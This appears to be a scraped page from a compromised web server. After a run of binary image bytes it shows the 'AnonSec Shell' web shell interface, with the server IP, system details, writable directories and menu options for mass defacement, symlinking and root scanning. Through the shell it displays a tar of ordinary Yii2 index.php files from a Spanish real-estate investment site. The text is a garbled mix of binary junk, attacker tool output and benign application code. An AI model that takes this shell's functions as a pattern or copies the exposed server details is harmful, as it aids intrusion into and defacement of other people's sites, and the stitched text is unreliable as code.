JFIFHHCnxxdC"&!1A2Q"aqBb1 ?R{~,.Y|@sl_޸s[+6ϵG};?2Y`&9LP?3rj  "@V]:3T-G*P ( *(@AEY]qqqALn+Wtu?)lQUT*Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ηnu ڶh%(Lvũbb-?M֍݌٥IHln㏷L(69L^"6Pd&1H&8@TUTCJ%eʹFTj4i5=0g J&Wc+3kU@PS@HH33M *"Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePPd\A2glo=WL(6^;k"ucoH"b ,PDVlvL_/:̗rN\mdcw T-O$w+FZ5T *Y~l:99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~YИ3M3@E)GTg%AnpPMUҀhԳW c֦iZ ffR 7qMcyAZTc0bZU k+oG<]APQTA={PDti@c>>KÚ"qL.1Pk6QY7t.k7o<P &yַܼJZyWz{UrS@~P)Y:A"]Y&ScVO%17 6l4i4YR5ruk*ؼdZͨZZ cLakb3N6æ\1`XTloTuTAA 7Uq@2ŬzoʼnБRͪ&8}:e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt"(.=Y:V#'H:δ4#6yjѥBB ;WD-ElFf67*\AmADQ__'2$TX9nu'm@iPDTqS`%u%3[nY, :g = tiXH]ij"+6Z* .~|05s6 ,ǡogm+KtE-BF ES@(UJxM~8%g/=Vw[Vh3lJT rK -kˎYٰ,ukͱٵf sXDP]p]&MS95O+j&f6m463@t8ЕX=6}HR5ٶ06/@嚵*6  "hP@eVDiYQT`7tLf4c?m//B4 lajL} :Eb#PHQb,yN`rkAb^ |}s4XB4*,@[{Ru+%le2}`,kI$U`>OMuhP% ʵ/ L\5aɕVN1R63}ZLj-Dl@*(K\^i@F@551k㫖hQ沬#h XV +;]6zOsFpiX$OQ )ųl4YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 162.19.86.63  /  Your IP : 216.73.217.81   [ Reverse IP ]
Web Server : Apache
System : Linux oirealestate.net 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : oinversion ( 10001)
PHP Version : 5.6.40
Disable Function : opcache_get_status
Domains : 5 Domains
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/oinversion.com/.trash/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/vhosts/oinversion.com/.trash/index.php.tar
var/www/vhosts/oinversion.com/httpdocs/frontend/web/index.php000064400000001416151455617470020543 0ustar00<?php

if($_SERVER["HTTPS"] != "on")
{
    header("Location: https://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]);
    exit();
}

defined('YII_DEBUG') or define('YII_DEBUG', false);
defined('YII_ENV') or define('YII_ENV', 'prod');

require(__DIR__ . '/../../vendor/autoload.php');
require(__DIR__ . '/../../vendor/yiisoft/yii2/Yii.php');
require(__DIR__ . '/../../common/config/bootstrap.php');
require(__DIR__ . '/../config/bootstrap.php');

$config = yii\helpers\ArrayHelper::merge(
    require(__DIR__ . '/../../common/config/main.php'),
    require(__DIR__ . '/../../common/config/main-local.php'),
    require(__DIR__ . '/../config/main.php'),
    require(__DIR__ . '/../config/main-local.php')
);

$application = new yii\web\Application($config);
$application->run();
var/www/vhosts/oinversion.com/httpdocs/environments/index.php000064400000003615151456232120020663 0ustar00<?php
/**
 * The manifest of files that are local to specific environment.
 * This file returns a list of environments that the application
 * may be installed under. The returned data must be in the following
 * format:
 *
 * ```php
 * return [
 *     'environment name' => [
 *         'path' => 'directory storing the local files',
 *         'skipFiles'  => [
 *             // list of files that should only copied once and skipped if they already exist
 *         ],
 *         'setWritable' => [
 *             // list of directories that should be set writable
 *         ],
 *         'setExecutable' => [
 *             // list of files that should be set executable
 *         ],
 *         'setCookieValidationKey' => [
 *             // list of config files that need to be inserted with automatically generated cookie validation keys
 *         ],
 *         'createSymlink' => [
 *             // list of symlinks to be created. Keys are symlinks, and values are the targets.
 *         ],
 *     ],
 * ];
 * ```
 */
return [
    'Development' => [
        'path' => 'dev',
        'setWritable' => [
            'backend/runtime',
            'backend/web/assets',
            'frontend/runtime',
            'frontend/web/assets',
        ],
        'setExecutable' => [
            'yii',
            'tests/codeception/bin/yii',
        ],
        'setCookieValidationKey' => [
            'backend/config/main-local.php',
            'frontend/config/main-local.php',
        ],
    ],
    'Production' => [
        'path' => 'prod',
        'setWritable' => [
            'backend/runtime',
            'backend/web/assets',
            'frontend/runtime',
            'frontend/web/assets',
        ],
        'setExecutable' => [
            'yii',
        ],
        'setCookieValidationKey' => [
            'backend/config/main-local.php',
            'frontend/config/main-local.php',
        ],
    ],
];
var/www/vhosts/oinversion.com/httpdocs/frontend/views/site/index.php000064400000005345151456236460022071 0ustar00<?php
use common\helpers\Translate;
use frontend\widgets\Gallery;
use common\helpers\Configuration;
/* @var $this yii\web\View */

$this->title = 'My Yii Application';
?>
<div class="site-index">

    <div class="jumbotron">
        <?= Translate::t('index', 'texto1')?>
        <?= Configuration::get('fasd-asd-afs-fs') ?>
        <p class="lead">You have successfully created your Yii-powered application.</p>

        <p><a class="btn btn-lg btn-success" href="http://www.yiiframework.com">Get started with Yii</a></p>
    </div>

    <div class="body-content">

        <div class="row">
            <div class="col-lg-4">
                <?= Gallery::widget(['slug' => 'fsa', 'ulClass'=> 'ulclass', 'liClass'=>'testli', 'imgClass'=>'imgclass']) ?>
                <?= Gallery::widget(['slug' => 'home-luxury-cars']) ?>
                <?= Gallery::widget(['slug' => 'tessf', 'imgClass'=>'imgclass']) ?>
                <h2>Heading</h2>

                <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et
                    dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip
                    ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu
                    fugiat nulla pariatur.</p>

                <p><a class="btn btn-default" href="http://www.yiiframework.com/doc/">Yii Documentation &raquo;</a></p>
            </div>
            <div class="col-lg-4">
                <h2>Heading</h2>

                <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et
                    dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip
                    ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu
                    fugiat nulla pariatur.</p>

                <p><a class="btn btn-default" href="http://www.yiiframework.com/forum/">Yii Forum &raquo;</a></p>
            </div>
            <div class="col-lg-4">
                <h2>Heading</h2>

                <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et
                    dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip
                    ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu
                    fugiat nulla pariatur.</p>

                <p><a class="btn btn-default" href="http://www.yiiframework.com/extensions/">Yii Extensions &raquo;</a></p>
            </div>
        </div>

    </div>
</div>
var/www/vhosts/oinversion.com/httpdocs/frontend/views/blog/index.php000064400000000206151456236460022037 0ustar00<?php
use yii\helpers\Html;
use yii\widgets\LinkPager;

?>

<?= $this->render('_posts', ['blogPostProvider'=> $blogPostProvider] ); ?>var/www/vhosts/oinversion.com/httpdocs/backend/web/index.php000064400000001212151456365350020303 0ustar00<?php
defined('YII_DEBUG') or define('YII_DEBUG', false);
defined('YII_ENV') or define('YII_ENV', 'prod');

require(__DIR__ . '/../../vendor/autoload.php');
require(__DIR__ . '/../../vendor/yiisoft/yii2/Yii.php');
require(__DIR__ . '/../../common/config/bootstrap.php');
require(__DIR__ . '/../config/bootstrap.php');

$config = yii\helpers\ArrayHelper::merge(
    require(__DIR__ . '/../../common/config/main.php'),
    require(__DIR__ . '/../../common/config/main-local.php'),
    require(__DIR__ . '/../config/main.php'),
    require(__DIR__ . '/../config/main-local.php')
);

$application = new yii\web\Application($config);
$application->run();
var/www/vhosts/oinversion.com/httpdocs/backend/views/project/index.php000064400000004306151456531650022336 0ustar00<?php

use yii\helpers\Html;
use yii\grid\GridView;
use yii\grid\ActionColumn;
use dmstr\widgets\Alert;

use common\modules\resizer\helpers\ResizeFilter;


$this->title = Yii::t('app', 'Proyecto');
$this->params['breadcrumbs'][] = $this->title;

$assetBundle = $this->getAssetManager()->getBundle('backend\assets\AppAsset');

?>

<?= $this->render('_content-header'); ?>

<?= Alert::widget() ?>

<p class="pull-left">
    <?= Html::a('<i class="glyphicon glyphicon-plus"></i> ' .
        Yii::t('app', 'Nuevo proyecto'),
        'create', [
                'class' => 'btn btn-primary',
    ]); ?>
</p>

<div class="clearfix"></div>

<?= GridView::widget([
    'dataProvider' => $projectProvider,
    'filterModel' => $projectSearch,
    'id' => 'project-grid',
    'tableOptions' => ['class' => 'table table-striped table-bordered box box-primary'],
    'columns' => [
        [
            'attribute' => 'mainProjectImage',
            'format' => 'raw',
            'value' => function($project) use ($assetBundle) {
                $preview=null;
                if ($project->mainProjectImage) {
//                  $preview=Yii::$app->params['frontendURL'].'uploads/projects/'.$project->mainProjectImage->file_name;
                  $preview=ResizeFilter::apply('uploads/projects/'.$project->mainProjectImage->file_name, 'ProjectSmall');
//                  die($preview);
                }
                if (!$preview) {
                  $preview=$assetBundle->baseUrl.'/img/no-image.png';
                }
                return Html::a(Html::img($preview, [
                    'style'=>'max-width: 100px;'
                ]), ['update', 'id'=>$project->id]);
//              return $project->id;
            }
        ],
        [
            'attribute' => 'title',
            'format' => 'raw',
            'value' => function($project){
                return Html::a($project->title, ['update', 'id'=>$project->id]);
            }
        ],
          'city',
          'investors',
          'profit',
          'term',
        [
            'class' => ActionColumn::className(),
            'template' => '{update}{delete}',
        ],
    ]
]);
?>
var/www/vhosts/oinversion.com/httpdocs/backend/views/content/index.php000064400000002274151456531700022340 0ustar00<?php

use yii\helpers\Html;
use yii\grid\GridView;
use yii\grid\ActionColumn;
use dmstr\widgets\Alert;


$this->title = Yii::t('app', 'Content');
$this->params['breadcrumbs'][] = $this->title;
?>

<?= $this->render('_content-header'); ?>

<?= Alert::widget() ?>

<p class="pull-left">
    <?= Html::a('<i class="glyphicon glyphicon-plus"></i> ' .
        Yii::t('app', 'Add New Block'),
        'create', [
                'class' => 'btn btn-primary',
    ]); ?>
</p>

<div class="clearfix"></div>

<?= GridView::widget([
    'dataProvider' => $contentProvider,
    'filterModel' => $contentSearch,
    'id' => 'content-grid',
    'tableOptions' => ['class' => 'table table-striped table-bordered box box-primary'],
    'columns' => [
        'flatPage',
        [
            'attribute' => 'name',
            'label' => Yii::t('app', 'Block'),
            'format' => 'raw',
            'value' => function($content){
                return Html::a($content->name, ['update', 'id'=>$content->id]);
            }
        ],
        'created_at:datetime',
        'updated_at:datetime',
        [
            'class' => ActionColumn::className(),
            'template' => '{update}',
        ],
    ]
]);
?>
var/www/vhosts/oinversion.com/httpdocs/backend/views/gallery/index.php000064400000002265151456531710022326 0ustar00<?php
use yii\helpers\Html;
use yii\grid\GridView;
use yii\grid\ActionColumn;
use dmstr\widgets\Alert;

$this->title = Yii::t('app', 'Galleries');
$this->params['breadcrumbs'][] = ['label' => $this->title, 'url' => ['index']];
?>

<?= $this->render('_content-header'); ?>

<?= Alert::widget() ?>

<p class="pull-left">
    <?= Html::a('<i class="glyphicon glyphicon-plus"></i> ' .
        Yii::t('app', 'Add New Gallery'),
        'create', [
                'class' => 'btn btn-primary',
    ]); ?>
</p>

<div class="clearfix"></div>

<?= GridView::widget([
    'dataProvider' => $galleryProvider,
    'filterModel' => $gallerySearch,
    'id' => 'manage-galleries-grid',
    'tableOptions' => ['class' => 'table table-striped table-bordered box box-primary'],
    'columns' => [
        [
            'attribute' => 'name',
            'format' => 'raw',
            'value' => function($gallery){
                return Html::a($gallery->name, ['update', 'id'=>$gallery->id]);
            }
        ],
        'slug',
        'created_at:datetime',
        'updated_at:datetime',
        [
            'class' => ActionColumn::className(),
            'template' => '{update}',
        ],
    ]
]);

?>var/www/vhosts/oinversion.com/httpdocs/backend/views/site/index.php000064400000005423151456531710021632 0ustar00<?php
use yii\helpers\Html;

/* @var $this yii\web\View */
$this->title = 'HeavyCMS';
?>
<div class="site-index">
  <div class="body-content">
    <div class="row">
      <div class="jumbotron">
        <h1><?= Html::encode(Yii::t('app', 'Welcome to HeavyCMS')); ?></h1>
        <h2>(<?= Html::encode(Yii::t('app', 'easy, fast, flexible')); ?>)</h2>
      </div>
      <div class="col-lg-3 col-xs-6">
        <div class="small-box bg-aqua">
          <div class="inner">
            <h3><?= Html::encode(Yii::t('app', 'Step 1')); ?></h3>
            <p><?= Html::encode(Yii::t('app', 'Add Pages')); ?></p>
          </div>
          <div class="icon">
            <i class="fa fa-files-o"></i>
          </div>
          <?= Html::a(Yii::t('app', 'Create your own Pages').' <i class="fa fa-arrow-circle-right"></i>',
                          $url = ['flat-page/index'],
                          ['class' => 'small-box-footer']);
          ?>
          </div>
      </div>
      <div class="col-lg-3 col-xs-6">
        <div class="small-box bg-green">
          <div class="inner">
            <h3><?= Html::encode(Yii::t('app', 'Step 2')); ?></h3>
            <p><?= Html::encode(Yii::t('app', 'Add Content')); ?></p>
          </div>
          <div class="icon">
            <i class="fa fa-indent"></i>
          </div>
          <?= Html::a(Yii::t('app', 'Create great Content').' <i class="fa fa-arrow-circle-right"></i>',
                          $url = ['content/index'],
                          ['class' => 'small-box-footer']);
          ?>
        </div>
      </div>
      <div class="col-lg-3 col-xs-6">
        <div class="small-box bg-yellow">
          <div class="inner">
            <h3><?= Html::encode(Yii::t('app', 'Step 3')); ?></h3>
            <p><?= Html::encode(Yii::t('app', 'Add Images')); ?></p>
          </div>
          <div class="icon">
            <i class="fa fa-image"></i>
          </div>
          <?= Html::a(Yii::t('app', 'Upload awesome Images').' <i class="fa fa-arrow-circle-right"></i>',
                          $url = ['gallery/index'],
                          ['class' => 'small-box-footer']);
          ?>
        </div>
      </div>
      <div class="col-lg-3 col-xs-6">
        <div class="small-box bg-red">
          <div class="inner">
            <h3><?= Html::encode(Yii::t('app', 'Step 4')); ?></h3>
            <p><?= Html::encode(Yii::t('app', 'Add Blog Posts')); ?></p>
          </div>
          <div class="icon">
            <i class="fa fa-book"></i>
          </div>
          <?= Html::a(Yii::t('app', 'Write interesting Blog Posts').' <i class="fa fa-arrow-circle-right"></i>',
                          $url = ['blog-post/index'],
                          ['class' => 'small-box-footer']);
          ?>
        </div>
      </div>
    </div>

  </div>
</div>
var/www/vhosts/oinversion.com/httpdocs/backend/views/member/index.php000064400000002121151456532000022116 0ustar00<?php

use yii\helpers\Html;
use yii\grid\GridView;
use yii\grid\ActionColumn;
use dmstr\widgets\Alert;


$this->title = Yii::t('app', 'Equipo');
$this->params['breadcrumbs'][] = $this->title;
?>

<?= $this->render('_content-header'); ?>

<?= Alert::widget() ?>

<p class="pull-left">
    <?= Html::a('<i class="glyphicon glyphicon-plus"></i> ' .
        Yii::t('app', 'Nuevo miembro'),
        'create', [
                'class' => 'btn btn-primary',
    ]); ?>
</p>

<div class="clearfix"></div>

<?= GridView::widget([
    'dataProvider' => $memberProvider,
    'filterModel' => $memberSearch,
    'id' => 'content-grid',
    'tableOptions' => ['class' => 'table table-striped table-bordered box box-primary'],
    'columns' => [
        [
            'attribute' => 'name',
            'format' => 'raw',
            'value' => function($member){
                return Html::a($member->name, ['update', 'id'=>$member->id]);
            }
        ],
        'position',
        [
            'class' => ActionColumn::className(),
            'template' => '{update}{delete}',
        ],
    ]
]);
?>
var/www/vhosts/oinversion.com/httpdocs/frontend/themes/oinversion/views/site/index.php000064400000021702151677634610025550 0ustar00<?php
use common\helpers\Translate;
use frontend\widgets\Gallery;
use common\helpers\Configuration;
use common\models\FlatPage;
use common\widgets\Alert;
use frontend\models\ContactForm;
use yii\bootstrap\ActiveForm;
use yii\helpers\Html;
/* @var $this yii\web\View */

$assetBundle = $this->getAssetManager()->getBundle('frontend\assets\OinversionAssetBundle');

?>
<div class="site-index">
    <div class="container-fluid top-banner-index">
        <div class="container">
            <div class="row">
                <div class="col-sm-6 col-xs-12">
                    <h1><span class="blue"><?= Yii::t('app', 'main.title') ?></h1>
                </div>
                <div class="col-sm-offset-1 col-sm-5 col-xs-offset-1 col-xs-10 form-wrapper">
                    <div id="contact-form" class="form form-block">
                        <?= Alert::widget() ?>
                        <h3><?= Yii::t('app', 'index.form-title') ?></h3>
                        <p class="subtitle"><?= Yii::t('app', 'index.form-text') ?></p>

                        <?php $form = ActiveForm::begin([
                            'id' => 'contact-form-index',
                            'enableClientValidation' => false,
                        ]); ?>

                        <?= $form->field($model, 'name')->label(false)->textInput(['placeholder' => Yii::t('app', 'contact.name')]) ?>

                        <?= $form->field($model, 'email')->label(false)->textInput(['placeholder' => Yii::t('app', 'contact.email')]) ?>

                        <?= $form->field($model, 'phone')->textInput()->label(false)->textInput(['placeholder' => Yii::t('app', 'contact.phone')]) ?>
                        
                        <div class="form-group required <?php if ($model->hasErrors('g_recaptcha_response')): ?>has-error<?php endif; ?>">
                          <div class="g-recaptcha" data-sitekey="<?=Yii::$app->params['recaptcha_site_key'];?>"></div>
                          <?php if ($model->hasErrors('g_recaptcha_response')): ?>
                            <?php echo Html::error($model, 'g_recaptcha_response', [
                                'tag'=>'p',
                                'class'=>'help-block help-block-error',
                            ]); ?>
                          <?php endif; ?>
                        </div>

                        <?= $form->field($model, 'body_more')->textInput(['class'=>'hidden'])->label(false)?>

                        <div class="form-group">
                            <?= Html::submitButton(\Yii::t('app', 'common.send-contact'), ['class' => 'btn button-secondary button-text', 'name' => 'contact-button']) ?>
                        </div>

                        <div class="terms">
                            <p class="text">
                                <?= \Yii::t('app', 'common.terms')?>
                            </p>
                        </div>

                        <?php ActiveForm::end(); ?>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container main-index">
        <div class="row">
            <div class="col-sm-12 top-main-index">
                <h2><?= Yii::t('app', 'index.main-title') ?></h2>
                <img class="handshake" alt="Tus bienes, una historia feliz" src="<?= $assetBundle->baseUrl ?>/img/handshake.jpg"/>
                <p class="main-text">
                    <?= Yii::t('app', 'index.main-text') ?>
                </p>
            </div>
            <div class="img-text-block col-sm-12">
                <div class="row">
                    <div class="col-sm-6">
                        <h3><?= Yii::t('app', 'index.patrimony-title') ?></h3>
                        <p>
                            <?= Yii::t('app', 'index.patrimony-text') ?>
                        </p>
                    </div>
                    <div class="col-sm-6">
                        <img class="computer" alt="Patrimonio" src="<?= $assetBundle->baseUrl ?>/img/computer.jpg"/>
                    </div>
                </div>
            </div>
            <div class="img-text-block gray-bg col-sm-12 no-resp">
                <div class="row">
                    <div class="col-sm-6">
                        <img class="computer" alt="Coinversión" src="<?= $assetBundle->baseUrl ?>/img/coinvestment.jpg"/>
                    </div>
                    <div class="col-sm-6">
                        <h3><?= Yii::t('app', 'index.coinvestment-title') ?></h3>
                        <p>
                            <?= Yii::t('app', 'index.coinvestment-text') ?>
                        </p>
                    </div>
                </div>    
            </div>
            <div class="img-text-block gray-bg col-sm-12 resp">
                <div class="row">
                    <div class="col-sm-6">
                        <h3><?= Yii::t('app', 'index.coinvestment-title') ?></h3>
                        <p>
                            <?= Yii::t('app', 'index.coinvestment-text') ?>
                        </p>
                    </div>
                    <div class="col-sm-6">
                        <img class="computer" alt="Coinversión" src="<?= $assetBundle->baseUrl ?>/img/coinvestment.jpg"/>
                    </div>
                </div>    
            </div>
            <div class="img-text-block col-sm-12">
                <div class="row">
                    <div class="col-sm-6">
                        <h3><?= Yii::t('app', 'index.funds-title') ?></h3>
                        <p>
                            <?= Yii::t('app', 'index.funds-text') ?>
                        </p>
                    </div>
                    <div class="col-sm-6">
                        <img class="computer" alt="Fondos de Inversión" src="<?= $assetBundle->baseUrl ?>/img/funds.jpg"/>
                    </div>
                </div>    
            </div>
            <div class="img-text-block col-sm-12 no-resp last">
                <div class="row">
                    <div class="col-sm-6">
                        <img class="computer" alt="Proyectos" src="<?= $assetBundle->baseUrl ?>/img/arte-proyectos.png"/>
                    </div>
                    <div class="col-sm-6">
                        <h3><?= Yii::t('app', 'index.projects-title') ?></h3>
                        <p>
                            <?= Yii::t('app', 'index.projects-text') ?>
                        </p>
                    </div>
                </div>    
            </div>
            <div class="img-text-block col-sm-12 resp last">
                <div class="row">
                    <div class="col-sm-6">
                        <h3><?= Yii::t('app', 'index.projects-title') ?></h3>
                        <p>
                            <?= Yii::t('app', 'index.projects-text') ?>
                        </p>
                    </div>
                    <div class="col-sm-6">
                        <img class="computer" alt="Proyectos" src="<?= $assetBundle->baseUrl ?>/img/arte-proyectos.png"/>
                    </div>
                </div>    
            </div>
        </div>
        <!--div class="row control-panel">
            <div class="col-sm-12">
                <h3><?= Yii::t('app', 'index.panel-title') ?></h3>
                <p>
                    <?= Yii::t('app', 'index.panel-text') ?>
                </p>
                <p class="offers">
                    ¿Qué te ofrece?
                </p>
            </div>
            <div class="col-sm-4 items">
                <div class="item-block left">
                    <img alt="Buscador de inversiones" src="<?= $assetBundle->baseUrl ?>/img/investment-search.jpg"/>
                    <h4><?= Yii::t('app', 'index.search-title') ?></h4>
                    <p><?= Yii::t('app', 'index.search-text') ?></p>
                </div>
                <div class="item-block left">
                    <img alt="Chat con asesor" src="<?= $assetBundle->baseUrl ?>/img/adviser-chat.jpg"/>
                    <h4><?= Yii::t('app', 'index.advisor-title') ?></h4>
                    <p><?= Yii::t('app', 'index.advisor-text') ?></p>
                </div>
            </div>
            <div class="col-sm-4 no-resp">
                <img class="phone" alt="Phone" src="<?= $assetBundle->baseUrl ?>/img/phone.jpg"/>
            </div>
            <div class="col-sm-4 items">
                <div class="item-block right">
                    <img alt="Gestión de documentos" src="<?= $assetBundle->baseUrl ?>/img/docs-management.jpg"/>
                    <h4><?= Yii::t('app', 'index.management-title') ?></h4>
                    <p><?= Yii::t('app', 'index.management-text') ?></p>
                </div>
                <div class="item-block right">
                    <img alt="Inver-news" src="<?= $assetBundle->baseUrl ?>/img/news.jpg"/>
                    <h4><?= Yii::t('app', 'index.news-title') ?></h4>
                    <p><?= Yii::t('app', 'index.news-text') ?></p>
                </div>
            </div>
        </div-->
    </div>
</div>
var/www/vhosts/oinversion.com/httpdocs/vendor/yiisoft/yii2/requirements/views/web/index.php000064400000006223151700530770026432 0ustar00<?php
/* @var $this YiiRequirementChecker */
/* @var $summary array */
/* @var $requirements array[] */
?><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8"/>
    <title>Yii Application Requirement Checker</title>
    <?php $this->renderViewFile(dirname(__FILE__) . '/css.php'); ?>
</head>
<body>
<div class="container">
    <header>
        <h1>Yii Application Requirement Checker</h1>
    </header>
    <hr>
    <main>
        <h3>Description</h3>
        <p>
        This script checks if your server configuration meets the requirements
        for running Yii application.
        It checks if the server is running the right version of PHP,
        if appropriate PHP extensions have been loaded, and if php.ini file settings are correct.
        </p>
        <p>
        There are two kinds of requirements being checked. Mandatory requirements are those that have to be met
        to allow Yii to work as expected. There are also some optional requirements being checked which will
        show you a warning when they do not meet. You can use Yii framework without them but some specific
        functionality may be not available in this case.
        </p>

        <h3>Conclusion</h3>
        <?php if ($summary['errors'] > 0): ?>
            <div class="alert alert-danger">
                <strong>Unfortunately your server configuration does not satisfy the requirements by this application.<br>Please refer to the table below for detailed explanation.</strong>
            </div>
        <?php elseif ($summary['warnings'] > 0): ?>
            <div class="alert alert-info">
                <strong>Your server configuration satisfies the minimum requirements by this application.<br>Please pay attention to the warnings listed below and check if your application will use the corresponding features.</strong>
            </div>
        <?php else: ?>
            <div class="alert alert-success">
                <strong>Congratulations! Your server configuration satisfies all requirements.</strong>
            </div>
        <?php endif; ?>

        <h3>Details</h3>

        <table class="table table-bordered">
            <tr><th>Name</th><th>Result</th><th>Required By</th><th>Memo</th></tr>
            <?php foreach ($requirements as $requirement): ?>
            <tr class="<?php echo $requirement['condition'] ? 'success' : ($requirement['mandatory'] ? 'danger' : 'warning') ?>">
                <td>
                <?php echo $requirement['name'] ?>
                </td>
                <td>
                <span class="result"><?php echo $requirement['condition'] ? 'Passed' : ($requirement['mandatory'] ? 'Failed' : 'Warning') ?></span>
                </td>
                <td>
                <?php echo $requirement['by'] ?>
                </td>
                <td>
                <?php echo $requirement['memo'] ?>
                </td>
            </tr>
            <?php endforeach; ?>
        </table>
    </main>
    <hr>
    <footer>
        <p>Server: <?php echo $this->getServerInfo() . ' ' . $this->getNowDate() ?></p>
        <p>Powered by <a href="http://www.yiiframework.com/" rel="external">Yii Framework</a></p>
    </footer>
</div>
</body>
</html>
var/www/vhosts/oinversion.com/httpdocs/vendor/yiisoft/yii2/requirements/views/console/index.php000064400000002370151700535170027315 0ustar00<?php
/* @var $this YiiRequirementChecker */
/* @var $summary array */
/* @var $requirements array[] */

echo "\nYii Application Requirement Checker\n\n";

echo "This script checks if your server configuration meets the requirements\n";
echo "for running Yii application.\n";
echo "It checks if the server is running the right version of PHP,\n";
echo "if appropriate PHP extensions have been loaded, and if php.ini file settings are correct.\n";

$header = 'Check conclusion:';
echo "\n{$header}\n";
echo str_pad('', strlen($header), '-')."\n\n";

foreach ($requirements as $key => $requirement) {
    if ($requirement['condition']) {
        echo $requirement['name'].": OK\n";
        echo "\n";
    } else {
        echo $requirement['name'].': '.($requirement['mandatory'] ? 'FAILED!!!' : 'WARNING!!!')."\n";
        echo 'Required by: '.strip_tags($requirement['by'])."\n";
        $memo = strip_tags($requirement['memo']);
        if (!empty($memo)) {
            echo 'Memo: '.strip_tags($requirement['memo'])."\n";
        }
        echo "\n";
    }
}

$summaryString = 'Errors: '.$summary['errors'].'   Warnings: '.$summary['warnings'].'   Total checks: '.$summary['total'];
echo str_pad('', strlen($summaryString), '-')."\n";
echo $summaryString;

echo "\n\n";
var/www/vhosts/oinversion.com/httpdocs/backend/views/flat-page/index.php000064400000003034151701056210022510 0ustar00<?php

use yii\helpers\Html;
use yii\grid\GridView;
use yii\grid\ActionColumn;
use dmstr\widgets\Alert;


$this->title = Yii::t('app', 'Pages');
$this->params['breadcrumbs'][] = $this->title;
?>

<?= $this->render('_content-header'); ?>

<?= Alert::widget() ?>

<p class="pull-left">
    <?= Html::a('<i class="glyphicon glyphicon-plus"></i> ' .
        Yii::t('app', 'Add New Page'),
        'create', [
                'class' => 'btn btn-primary',
    ]); ?>
</p>

<div class="clearfix"></div>

<?= GridView::widget([
    'dataProvider' => $flatPageProvider,
    'filterModel' => $flatPageSearch,
    'id' => 'flat-pages-grid',
    'tableOptions' => ['class' => 'table table-striped table-bordered box box-primary'],
    'columns' => [
        [
            'attribute' => 'url',
            'format' => 'raw',
            'value' => function($flatPage){
                return Html::a($flatPage->url, ['update', 'id'=>$flatPage->id]);
            }
        ],
        'anchor',
        'is_active:boolean',
        'display_on_menu:boolean',
        'created_at:datetime',
        'updated_at:datetime',
        [
            'class' => ActionColumn::className(),
            'template' => '{update}{view}',
            'buttons' => [
                'view' => function($url, $flatPage, $key){
                    return Html::a('<span class="glyphicon glyphicon-eye-open"></span>',
                                    $flatPage->getFullUrl(),
                                    ['target'=>'_blank']);
                }
            ],
        ],
    ]
]);
?>
var/www/vhosts/oinversion.com/httpdocs/backend/views/blog-post/index.php000064400000002441151701062350022561 0ustar00<?php

use yii\helpers\Html;
use yii\grid\GridView;
use yii\grid\ActionColumn;
use dmstr\widgets\Alert;


$this->title = Yii::t('app', 'Blog Posts');
$this->params['breadcrumbs'][] = $this->title;
?>

<?= $this->render('_content-header'); ?>

<?= Alert::widget() ?>

<p class="pull-left">
    <?= Html::a('<i class="glyphicon glyphicon-plus"></i> ' .
        Yii::t('app', 'New Post'),
        'create', [
                'class' => 'btn btn-primary',
    ]); ?>
</p>

<div class="clearfix"></div>

<?= GridView::widget([
    'dataProvider' => $blogPostProvider,
    'filterModel' => $blogPostSearch,
    'id' => 'content-grid',
    'tableOptions' => ['class' => 'table table-striped table-bordered box box-primary'],
    'columns' => [
        [
            'attribute' => 'title',
            'format' => 'raw',
            'value' => function($blogPost){
                return Html::a($blogPost->title, ['update', 'id'=>$blogPost->id]);
            }
        ],
        'is_published:boolean',
        [
            'attribute' => 'blogCategory.name',
            'label' => Yii::t('app', 'Blog Category')
        ],
        'created_at:datetime',
        'updated_at:datetime',
        [
            'class' => ActionColumn::className(),
            'template' => '{update}{delete}',
        ],
    ]
]);
?>
var/www/vhosts/oinversion.com/httpdocs/vendor/yiisoft/yii2-debug/views/default/index.php000064400000012223151703374750025646 0ustar00<?php
/* @var $this \yii\web\View */
/* @var $manifest array */
/* @var $searchModel \yii\debug\models\search\Debug */
/* @var $dataProvider ArrayDataProvider */
/* @var $panels \yii\debug\Panel[] */

use yii\data\ArrayDataProvider;
use yii\grid\GridView;
use yii\helpers\Html;

$this->title = 'Yii Debugger';

?>
<div class="default-index">
    <div id="yii-debug-toolbar" class="yii-debug-toolbar yii-debug-toolbar_position_top" style="display: none;">
        <div class="yii-debug-toolbar__bar">
            <div class="yii-debug-toolbar__block yii-debug-toolbar__title">
                <a href="#">
                    <img width="29" height="30" alt="" src="<?= \yii\debug\Module::getYiiLogo() ?>">
                </a>
            </div>
            <?php foreach ($panels as $panel): ?>
                <?= $panel->getSummary() ?>
            <?php endforeach; ?>
        </div>
    </div>

    <div class="container">
        <div class="row">
<?php

if (isset($this->context->module->panels['db']) && isset($this->context->module->panels['request'])) {

    echo "			<h1>Available Debug Data</h1>";

    $codes = [];
    foreach ($manifest as $tag => $vals) {
